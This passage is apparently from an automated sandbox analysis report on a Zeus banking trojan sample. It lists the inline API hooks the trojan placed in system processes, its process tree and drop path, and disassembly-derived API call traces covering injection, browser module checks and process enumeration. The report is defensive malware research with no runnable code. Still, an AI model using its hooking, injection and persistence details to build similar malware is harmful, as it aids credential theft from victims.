NtCreateUserProcess	INLINE	0xE9 0x97 0x76 0x67 0x7A 0xA0
ZwCreateUserProcess	INLINE	0xE9 0x97 0x76 0x67 0x7A 0xA0

Process: taskhost.exe, Module: kernel32.dll

Function Name	Hook Type	New Data
GetFileAttributesExW	INLINE	0xE9 0x92 0x27 0x76 0x67 0x75

Process: conhost.exe, Module: USER32.dll

Function Name	Hook Type	New Data
CallWindowProcA	INLINE	0xE9 0x9F 0xF8 0x8A 0xA4 0x40
CallWindowProcW	INLINE	0xE9 0x9B 0xB3 0x3A 0xA2 0x20
EndPaint	INLINE	0xE9 0x93 0x30 0x0D 0xDD 0xD0
GetDCEx	INLINE	0xE9 0x9C 0xCD 0xD1 0x13 0x30
DefWindowProcW	INLINE	0xE9 0x90 0x0C 0xC7 0x72 0x20
DefDlgProcA	INLINE	0xE9 0x95 0x52 0x25 0x54 0x40
DefDlgProcW	INLINE	0xE9 0x98 0x8A 0xA2 0x29 0x91
DefWindowProcA	INLINE	0xE9 0x9B 0xB9 0x90 0x03 0x31
PeekMessageA	INLINE	0xE9 0x97 0x7D 0xD8 0x8C 0xC0
PeekMessageW	INLINE	0xE9 0x94 0x4F 0xF2 0x29 0x90
RegisterClassW	INLINE	0xE9 0x94 0x40 0x0B 0xBF 0xF0
RegisterClassA	INLINE	0xE9 0x98 0x83 0x30 0x05 0x51
SetCapture	INLINE	0xE9 0x94 0x41 0x14 0x4E 0xE0
DefFrameProcA	INLINE	0xE9 0x91 0x1D 0xDA 0xA7 0x70
DefFrameProcW	INLINE	0xE9 0x9A 0xA3 0x3A 0xA8 0x80
RegisterClassExW	INLINE	0xE9 0x9C 0xCA 0xAC 0xC6 0x60
TranslateMessage	INLINE	0xE9 0x9E 0xE8 0x81 0x1D 0xD1
BeginPaint	INLINE	0xE9 0x9A 0xAC 0xCD 0xDC 0xC0
RegisterClassExA	INLINE	0xE9 0x94 0x4F 0xF8 0x87 0x71
GetMessagePos	INLINE	0xE9 0x93 0x30 0x05 0x51 0x10
ReleaseCapture	INLINE	0xE9 0x92 0x27 0x7F 0xF5 0x50
GetUpdateRect	INLINE	0xE9 0x99 0x97 0x79 0x97 0x70
GetUpdateRgn	INLINE	0xE9 0x91 0x1B 0xB1 0x1A 0xA0
GetCapture	INLINE	0xE9 0x96 0x62 0x2F 0xFE 0xE0
GetMessageA	INLINE	0xE9 0x96 0x6D 0xD9 0x92 0x20
GetMessageW	INLINE	0xE9 0x91 0x1D 0xD2 0x2B 0xB0
GetDC	INLINE	0xE9 0x9F 0xFD 0xDE 0xE8 0x80
GetClipboardData	INLINE	0xE9 0x91 0x16 0x66 0x65 0x50
OpenInputDesktop	INLINE	0xE9 0x98 0x8F 0xF8 0x88 0x81
GetWindowDC	INLINE	0xE9 0x99 0x93 0x3F 0xF0 0x00
ReleaseDC	INLINE	0xE9 0x96 0x67 0x7E 0xE9 0x90
DefMDIChildProcA	INLINE	0xE9 0x90 0x0E 0xEB 0xB2 0x20
DefMDIChildProcW	INLINE	0xE9 0x98 0x87 0x7A 0xAA 0xA0
GetCursorPos	INLINE	0xE9 0x94 0x4F 0xFF 0xF7 0x70
SwitchDesktop	INLINE	0xE9 0x94 0x4C 0xCC 0xCC 0xC1
SetCursorPos	INLINE	0xE9 0x95 0x56 0x6F 0xF7 0x70

Process: conhost.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
LdrLoadDll	INLINE	0xE9 0x91 0x10 0x0D 0xD0 0x0F
NtCreateUserProcess	INLINE	0xE9 0x97 0x76 0x67 0x7A 0xAF
ZwCreateUserProcess	INLINE	0xE9 0x97 0x76 0x67 0x7A 0xAF

Process: conhost.exe, Module: kernel32.dll

Function Name	Hook Type	New Data
GetFileAttributesExW	INLINE	0xE9 0x92 0x27 0x76 0x67 0x74

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe PID: 3684 Parent PID: 1236

General

Start time:	14:57:10
Start date:	05/02/2015
Path:	C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x400000
File size:	141824 bytes
MD5 hash:	4D08934BD040ED25DFA46542E396CB05

Chronological Activities

Analysis Process: madog.exe PID: 3700 Parent PID: 3684

General

Start time:	14:57:11
Start date:	05/02/2015
Path:	C:\Users\admin\AppData\Roaming\Oddyn\madog.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\admin\AppData\Roaming\Oddyn\madog.exe
Imagebase:	0x77130000
File size:	141824 bytes
MD5 hash:	7E7B95B944D3FD8A2AA8EEA7CE4B19BF

Chronological Activities

Analysis Process: taskhost.exe PID: 1292 Parent PID: 3700

General

Start time:	14:57:11
Start date:	05/02/2015
Path:	C:\Windows\System32\taskhost.exe
Wow64 process (32bit):	false
Commandline:	taskhost.exe
Imagebase:	0x570000
File size:	49152 bytes
MD5 hash:	8F4F5A5C1BAE72CE6EAEEA1CA3F98CA2

Chronological Activities

Analysis Process: dwm.exe PID: 2020 Parent PID: 1292

General

Start time:	14:57:21
Start date:	05/02/2015
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\Dwm.exe
Imagebase:	0xe60000
File size:	92672 bytes
MD5 hash:	505BF4D1CADEB8D4F8BCD08D944DE25D

Chronological Activities

Analysis Process: explorer.exe PID: 2032 Parent PID: 3700

General

Start time:	14:57:22
Start date:	05/02/2015
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xc30000
File size:	2614272 bytes
MD5 hash:	2626FC9755BE22F805D3CFA0CE3EE727

Chronological Activities

Analysis Process: conhost.exe PID: 1132 Parent PID: 3700

General

Start time:	14:57:29
Start date:	05/02/2015
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe
Imagebase:	0x5c0000
File size:	271360 bytes
MD5 hash:	29D9FCDF65B7C823688A035937BB6697

Chronological Activities

Analysis Process: taskhost.exe PID: 540 Parent PID: 3700

General

Start time:	14:57:29
Start date:	05/02/2015
Path:	C:\Windows\System32\taskhost.exe
Wow64 process (32bit):	false
Commandline:	taskhost.exe
Imagebase:	0x570000
File size:	49152 bytes
MD5 hash:	8F4F5A5C1BAE72CE6EAEEA1CA3F98CA2

Chronological Activities

Analysis Process: WinSAT.exe PID: 1352 Parent PID: 3700

General

Start time:	14:57:30
Start date:	05/02/2015
Path:	C:\Windows\System32\WinSAT.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\winsat.exe formal -log -cancelevent dadd25ac-04b1-4563-96a2-ed65603ab78c
Imagebase:	0x110000
File size:	3367424 bytes
MD5 hash:	800C5B51F0FB6E2183FB0D41E2B74EB9

Chronological Activities

Analysis Process: conhost.exe PID: 2072 Parent PID: 3700

General

Start time:	14:57:31
Start date:	05/02/2015
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe
Imagebase:	0x5c0000
File size:	271360 bytes
MD5 hash:	29D9FCDF65B7C823688A035937BB6697

Chronological Activities

Analysis Process: cmd.exe PID: 4008 Parent PID: 3684

General

Start time:	14:57:32
Start date:	05/02/2015
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\admin\AppData\Local\Temp\tmp02840f01.bat
Imagebase:	0x4aae0000
File size:	301568 bytes
MD5 hash:	8AE6DD9A6D246004DA047F704F0CC487

Chronological Activities

Disassembly

Code Analysis

< >

Analysis Process: Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe PID: 3684 Parent PID: 1236

Executed Functions

Function 003C20C4, Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 003C2105
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 003C21DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 003C21FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 003C220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 003C221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 003C2230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 003C2242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 003C2254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 003C228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 003C229C
InitializeCriticalSection.KERNEL32(003D400C,?,?,00000000), ref: 003C22C9
WSAStartup.WS2_32(00000202,?), ref: 003C22DF
CreateEventW.KERNEL32(003D2C30,00000001,00000000,00000000,?,?,00000000), ref: 003C2300

Part of subcall function 003C49D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,003C2326,000000FF,003D2C08,?,?,00000000), ref: 003C49E2
Part of subcall function 003C49D2: GetTokenInformation.ADVAPI32(?,0000000C,00000000,00000004,00000000,?,?,?,003C2326,000000FF,003D2C08), ref: 003C4A0E
Part of subcall function 003C49D2: CloseHandle.KERNEL32(?), ref: 003C4A23

GetLengthSid.ADVAPI32(00000000,000000FF,003D2C08,?,?,00000000), ref: 003C2335

Part of subcall function 003C1E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 003C1E4B
Part of subcall function 003C1E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 003C1E5A
Part of subcall function 003C1E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 003C1E6E

GetCurrentProcessId.KERNEL32(00000000,0194F7D0,00000000,?,?,00000000), ref: 003C2362

Part of subcall function 003C1E8F: IsBadReadPtr.KERNEL32(?,?), ref: 003C1EBD

Part of subcall function 003C7A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 003C7AB5

Part of subcall function 003C1F98: InitializeCriticalSection.KERNEL32(003D3FB4,00000000,76C61857,00000000), ref: 003C1FAF
Part of subcall function 003C1F98: InitializeCriticalSection.KERNEL32(003D2AC8), ref: 003C1FE4
Part of subcall function 003C1F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C200C
Part of subcall function 003C1F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 003C2029
Part of subcall function 003C1F98: CloseHandle.KERNEL32(00000000), ref: 003C203A
Part of subcall function 003C1F98: InitializeCriticalSection.KERNEL32(003D23AC), ref: 003C2081
Part of subcall function 003C1F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 003C2093
Part of subcall function 003C1F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 003C209E

Part of subcall function 003C1EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 003C1F2C
Part of subcall function 003C1EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 003C1F56

Strings

RtlUserThreadStart, xrefs: 003C2220
NtCreateThread, xrefs: 003C21F4
SOFTWARE\Microsoft\Xyuxy, xrefs: 003C23F9
LoadLibraryA, xrefs: 003C2127
Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 003C23F3
NtQueryInformationProcess, xrefs: 003C220E
LdrLoadDll, xrefs: 003C2232
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 003C23AB
GetProcAddress, xrefs: 003C211D
NtCreateUserProcess, xrefs: 003C21FC
LdrGetDllHandle, xrefs: 003C2244

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BBECC, Relevance: 1.4, Strings: 1, Instructions: 117

Strings

P>Z>d>2>n><>F>, xrefs: 003BBF3B

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004120C4, Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412105
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 004121DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 004121FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0041220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0041221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00412230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00412242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00412254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0041228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 0041229C
InitializeCriticalSection.KERNEL32(0042400C,?,?,00000000), ref: 004122C9
WSAStartup.WS2_32(00000202,?), ref: 004122DF
CreateEventW.KERNEL32(00422C30,00000001,00000000,00000000,?,?,00000000), ref: 00412300

Part of subcall function 004149D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00412326,000000FF,00422C08,?,?,00000000), ref: 004149E2
Part of subcall function 004149D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00412326,000000FF,00422C08), ref: 00414A0E
Part of subcall function 004149D2: CloseHandle.KERNEL32(?), ref: 00414A23

GetLengthSid.ADVAPI32(00000000,000000FF,00422C08,?,?,00000000), ref: 00412335

Part of subcall function 00411E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 00411E4B
Part of subcall function 00411E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 00411E5A
Part of subcall function 00411E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 00411E6E

GetCurrentProcessId.KERNEL32(00000000,013FF7D0,00000000,?,?,00000000), ref: 00412362

Part of subcall function 00411E8F: IsBadReadPtr.KERNEL32(?,?), ref: 00411EBD

Part of subcall function 00417A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00417AB5

Part of subcall function 00411F98: InitializeCriticalSection.KERNEL32(00423FB4,00000000,76C61857,00000000), ref: 00411FAF
Part of subcall function 00411F98: InitializeCriticalSection.KERNEL32(00422AC8), ref: 00411FE4
Part of subcall function 00411F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041200C
Part of subcall function 00411F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00412029
Part of subcall function 00411F98: CloseHandle.KERNEL32(00000000), ref: 0041203A
Part of subcall function 00411F98: InitializeCriticalSection.KERNEL32(004223AC), ref: 00412081
Part of subcall function 00411F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00412093
Part of subcall function 00411F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 0041209E

Part of subcall function 00411EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00411F2C
Part of subcall function 00411EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 00411F56

Strings

GetProcAddress, xrefs: 0041211D
LdrGetDllHandle, xrefs: 00412244
LoadLibraryA, xrefs: 00412127
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 004123AB
NtCreateThread, xrefs: 004121F4
NtQueryInformationProcess, xrefs: 0041220E
NtCreateUserProcess, xrefs: 004121FC
RtlUserThreadStart, xrefs: 00412220
LdrLoadDll, xrefs: 00412232

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00412D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 004185D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 004185F5
Part of subcall function 004185D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00412D27,?,?,00000000), ref: 00418608
Part of subcall function 004185D0: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,00412D27,?,?,00000000), ref: 00418630
Part of subcall function 004185D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00418648
Part of subcall function 004185D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00412D27,?,?,00000000), ref: 00418662
Part of subcall function 004185D0: CloseHandle.KERNEL32(?), ref: 0041866B

Part of subcall function 00418678: VirtualFree.KERNEL32(0041CA1A,00000000,00008000,00000000,0041C83B,0041CA1A,?,000001E6,0000FFFF,00000001,0041CA1A,C:\Users\admin\AppData\Roaming,00000000), ref: 00418689
Part of subcall function 00418678: CloseHandle.KERNEL32(00000B8C), ref: 00418697

CreateMutexW.KERNEL32(00422C30,00000001,?,32901130,?,00000001,?), ref: 00412D91
GetLastError.KERNEL32 ref: 00412DA3
CloseHandle.KERNEL32(000001E6), ref: 00412DBA

Part of subcall function 0040E89E: RegOpenKeyExW.ADVAPI32(80000001,004229F8,00000000,00000001,?,?,76C605D7,00000000), ref: 0040E8E0

Part of subcall function 004131CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004131ED
Part of subcall function 004131CC: Process32FirstW.KERNEL32(000001E6,?), ref: 00413216
Part of subcall function 004131CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00413271
Part of subcall function 004131CC: CloseHandle.KERNEL32(00000000), ref: 0041328E
Part of subcall function 004131CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 004132A1
Part of subcall function 004131CC: CloseHandle.KERNEL32(?), ref: 0041330E
Part of subcall function 004131CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 0041331A
Part of subcall function 004131CC: CloseHandle.KERNEL32(000001E6), ref: 0041332B

ExitWindowsEx.USER32(00000014,80000000), ref: 00412DFD
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00412E1C
SetEvent.KERNEL32(00000000), ref: 00412E29
CloseHandle.KERNEL32(00000000), ref: 00412E30

Part of subcall function 00412A32: CloseHandle.KERNEL32(00422AF0), ref: 00412AF2

CloseHandle.KERNEL32(000001E6), ref: 00412E42
ReadProcessMemory.KERNEL32(000000FF,76C55F4D,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00412EA6
Sleep.KERNEL32(000001F4), ref: 00412EB8
IsWellKnownSid.ADVAPI32(013FF7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00412EC9
ReadProcessMemory.KERNELBASE(000000FF,76C55F4D,00000000,00000001,00000000), ref: 00412EF1
GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 00412F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00412F50

Part of subcall function 004197D0: VirtualProtect.KERNELBASE(0041CA1A,?,00000040,00000000,76C55F4D,?,?,00412F6C,?,?), ref: 004197E5
Part of subcall function 004197D0: VirtualProtect.KERNELBASE(0041CA1A,?,00000000,00000000,?,?,00412F6C,?,?), ref: 00419818

Part of subcall function 0041CA1A: GetFileAttributesW.KERNEL32 ref: 0041CA39
Part of subcall function 0041CA1A: lstrcmpiA.KERNEL32(?,?,00000000,00000101,00000002,?,00000000,0000000A,00000000,00000014,00000000,00000014,?,00000028,?,00000028), ref: 0041CB9C

CreateEventW.KERNEL32(00422C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 00412FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412FE7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00412FF7
CloseHandle.KERNEL32(0000000C), ref: 0041300D
CloseHandle.KERNEL32(?), ref: 00413013
CloseHandle.KERNEL32(?), ref: 00413016

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Part of subcall function 0041D0E6: LoadLibraryW.KERNEL32(?), ref: 0041D107
Part of subcall function 0041D0E6: GetProcAddress.KERNEL32(00000000,?), ref: 0041D128
Part of subcall function 0041D0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0041D159
Part of subcall function 0041D0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0041D17C
Part of subcall function 0041D0E6: FreeLibrary.KERNEL32(00000000), ref: 0041D1A3
Part of subcall function 0041D0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0041D1D9
Part of subcall function 0041D0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0041D212
Part of subcall function 0041D0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 0041D2AB
Part of subcall function 0041D0E6: NetApiBufferFree.NETAPI32(?), ref: 0041D2BE
Part of subcall function 0041D0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0041D2E2

Part of subcall function 00414E20: CharToOemW.USER32(?,?), ref: 00414E35

Part of subcall function 00416B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,00412E87,?,19367401,?,00000001,8889347B,00000002), ref: 00416BA9
Part of subcall function 00416B9E: CloseHandle.KERNEL32(00000000), ref: 00416BB4

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 00412507: CreateMutexW.KERNELBASE(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 0041CCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,013FF800,00000000), ref: 0041CD57
Part of subcall function 0041CCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 0041CD6F

Strings

C:\Users\admin\AppData\Roaming, xrefs: 00412F35, 00412F6C, 00412F94
, xrefs: 00412DD7
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 00412F08

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00413048, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 138

APIs

Part of subcall function 004120C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412105
Part of subcall function 004120C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 004121DB
Part of subcall function 004120C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 004121FA
Part of subcall function 004120C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0041220C
Part of subcall function 004120C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0041221E
Part of subcall function 004120C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00412230
Part of subcall function 004120C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00412242
Part of subcall function 004120C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00412254
Part of subcall function 004120C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0041228D
Part of subcall function 004120C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 0041229C
Part of subcall function 004120C4: InitializeCriticalSection.KERNEL32(0042400C,?,?,00000000), ref: 004122C9
Part of subcall function 004120C4: WSAStartup.WS2_32(00000202,?), ref: 004122DF
Part of subcall function 004120C4: CreateEventW.KERNEL32(00422C30,00000001,00000000,00000000,?,?,00000000), ref: 00412300
Part of subcall function 004120C4: GetLengthSid.ADVAPI32(00000000,000000FF,00422C08,?,?,00000000), ref: 00412335
Part of subcall function 004120C4: GetCurrentProcessId.KERNEL32(00000000,013FF7D0,00000000,?,?,00000000), ref: 00412362

SetErrorMode.KERNELBASE(00008007,00000000), ref: 0041306F
GetCommandLineW.KERNEL32(?), ref: 00413079
CommandLineToArgvW.SHELL32(00000000), ref: 00413080
LocalFree.KERNEL32(00000000), ref: 004130D5

Part of subcall function 0040E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0040E108
Part of subcall function 0040E0FB: GetThreadDesktop.USER32(00000000), ref: 0040E10F
Part of subcall function 0040E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0040E128

Part of subcall function 00405BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,004130F6), ref: 00405C03
Part of subcall function 00405BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,004130F6), ref: 00405C0A
Part of subcall function 00405BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,004130F6), ref: 00405C1C
Part of subcall function 00405BF6: SetEvent.KERNEL32(00422868,?,00000001), ref: 00405C69
Part of subcall function 00405BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00405C76

Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DF87
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DF97
Part of subcall function 0040DF74: TlsFree.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFA2
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFB0
Part of subcall function 0040DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00422868,00000000,0040E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DFBA
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040DFC7
Part of subcall function 0040DF74: SelectObject.GDI32(00000000,00000000), ref: 0040DFE1
Part of subcall function 0040DF74: DeleteObject.GDI32(00000000), ref: 0040DFF2
Part of subcall function 0040DF74: DeleteDC.GDI32(00000000), ref: 0040DFFF
Part of subcall function 0040DF74: CloseHandle.KERNEL32(00000000), ref: 0040E010
Part of subcall function 0040DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040E01F
Part of subcall function 0040DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0040E038

Part of subcall function 00412B08: GetModuleHandleW.KERNEL32(?), ref: 00412B1F
Part of subcall function 00412B08: GetProcAddress.KERNEL32(00000000,?), ref: 00412B41

Part of subcall function 00412D01: CreateMutexW.KERNEL32(00422C30,00000001,?,32901130,?,00000001,?), ref: 00412D91
Part of subcall function 00412D01: GetLastError.KERNEL32 ref: 00412DA3
Part of subcall function 00412D01: CloseHandle.KERNEL32(000001E6), ref: 00412DBA
Part of subcall function 00412D01: ExitWindowsEx.USER32(00000014,80000000), ref: 00412DFD
Part of subcall function 00412D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00412E1C
Part of subcall function 00412D01: SetEvent.KERNEL32(00000000), ref: 00412E29
Part of subcall function 00412D01: CloseHandle.KERNEL32(00000000), ref: 00412E30
Part of subcall function 00412D01: CloseHandle.KERNEL32(000001E6), ref: 00412E42
Part of subcall function 00412D01: ReadProcessMemory.KERNEL32(000000FF,76C55F4D,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00412EA6
Part of subcall function 00412D01: Sleep.KERNEL32(000001F4), ref: 00412EB8
Part of subcall function 00412D01: IsWellKnownSid.ADVAPI32(013FF7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00412EC9
Part of subcall function 00412D01: ReadProcessMemory.KERNELBASE(000000FF,76C55F4D,00000000,00000001,00000000), ref: 00412EF1
Part of subcall function 00412D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 00412F0D
Part of subcall function 00412D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00412F50
Part of subcall function 00412D01: CreateEventW.KERNEL32(00422C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 00412FCE
Part of subcall function 00412D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412FE7
Part of subcall function 00412D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00412FF7
Part of subcall function 00412D01: CloseHandle.KERNEL32(0000000C), ref: 0041300D
Part of subcall function 00412D01: CloseHandle.KERNEL32(?), ref: 00413013
Part of subcall function 00412D01: CloseHandle.KERNEL32(?), ref: 00413016

